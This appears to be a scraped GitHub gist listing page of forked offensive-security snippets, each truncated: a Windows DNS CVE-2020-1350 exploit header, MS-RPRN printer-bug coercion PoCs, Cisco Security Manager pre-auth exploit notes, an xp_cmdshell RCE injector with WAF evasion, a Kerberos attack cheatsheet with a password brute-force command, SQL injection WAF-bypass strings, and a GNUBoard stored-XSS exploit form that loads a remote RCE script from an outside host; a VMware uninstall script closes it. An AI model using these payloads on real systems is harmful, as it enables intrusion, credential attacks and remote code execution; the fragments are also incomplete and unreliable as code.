
#!/usr/bin/env python3
"""cve-2020-1350.py: Windows DNS Server Vulnerability"""
__author__ = "@joaovarelas"
__date__ = "July, 2020"
import binascii,socket,struct
from dnslib import *
@idkwim
idkwim / dementor.py
Created August 10, 2021 04:12 — forked from S3cur3Th1sSh1t/dementor.py
MS-RPRN exploit python
#!/usr/bin/env python
# originally by 3xocyte, modified by agsolino after native MS-RPRN functionality was added to impacket
# abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample
# some code from https://www.exploit-db.com/exploits/2879/
import os
import sys
import argparse
import binascii
import ConfigParser
@idkwim
idkwim / dementor.py
Created August 10, 2021 04:10 — forked from 3xocyte/dementor.py
rough PoC to connect to spoolss to elicit machine account authentication
#!/usr/bin/env python
# abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample
# some code from https://www.exploit-db.com/exploits/2879/
import os
import sys
import argparse
import binascii
import ConfigParser
@idkwim
idkwim / CSM_pocs.md
Created November 21, 2020 13:38 — forked from Frycos/CSM_pocs.md

TLDR

Cisco Security Manager is an enterprise-class security management application that provides insight into and control of Cisco security and network devices. Cisco Security Manager offers comprehensive security management (configuration and event management) across a wide range of Cisco security appliances, including Cisco ASA Adaptive Security Appliances, Cisco IPS Series Sensor Appliances, Cisco Integrated Services Routers (ISRs), Cisco Firewall Services Modules (FWSMs), Cisco Catalyst, Cisco Switches and many more. Cisco Security Manager allows you to manage networks of all sizes efficiently, from small networks to large networks consisting of hundreds of devices.

Several pre-auth vulnerabilities were submitted to Cisco on 2020-07-13 and (according to Cisco) patched in version 4.22 on 2020-11-10. Release notes didn't state anything about the vulnerabilities, and security advisories were not published. All payloads are processed in the context of NT AUTHORITY\SYSTEM.

@idkwim
idkwim / mashell.py
Created October 14, 2020 05:45 — forked from notdodo/mashell.py
Execute command using HEX or CHAR encoding. Bypass WAF and IPS filtering enabling RCE using xp_cmdshell: https://knifesec.com/evading-sql-injection-filters-to-get-rce/
#!/usr/bin/env python3
# Injector script to get a pseudo-interactive shell using xp_cmdshell
# Source post:
# Author: notdodo
# https://twitter.com/_d_0_d_o_
#
# USAGE: python3 ./mashell.py "whoami /priv"
#
import binascii
import hashlib
@idkwim
idkwim / kerberos_attacks_cheatsheet.md
Created September 30, 2020 02:56 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform Kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@idkwim
idkwim / sqli-bypass-waf.txt
Created May 28, 2020 06:46 — forked from zetc0de/sqli-bypass-waf.txt
Bypass WAF SQL Injection
[~] order by [~]
/**/ORDER/**/BY/**/
/*!order*/+/*!by*/
/*!ORDER BY*/
/*!50000ORDER BY*/
/*!50000ORDER*//**//*!50000BY*/
/*!12345ORDER*/+/*!BY*/
[~] UNION select [~]
@idkwim
idkwim / exploit.html
Created April 7, 2020 13:45 — forked from stypr/exploit.html
GNUBoard RCE ~2019.1
<!--
Stored XSS (2019.01.02)
-->
<form action="http://10.10.10.60/gnuboard5/adm/sms_admin/form_group_update.php" method="POST">
<input type='hidden' name='fg_no' value=''>
<input type='hidden' name='fg_name' id='payload' value=''>
</form>
<script>
var random = Math.round(Math.random() * 1000000000);
var script_url = '//10.10.10.30/vulnerable_rce_good_for_reason/rce.js'; // RCE from admin
@idkwim
idkwim / uninstall_vmware.sh
Created January 31, 2020 02:13
Completely uninstall VMware on macOS
#!/usr/bin/env bash
# Usage: bash uninstall_vmware.sh
remove() {
entry="$1"
echo -ne "Removing $entry ["
sudo rm -rf "$entry"
if [[ ! -e "$entry" ]]; then
echo -ne "OK"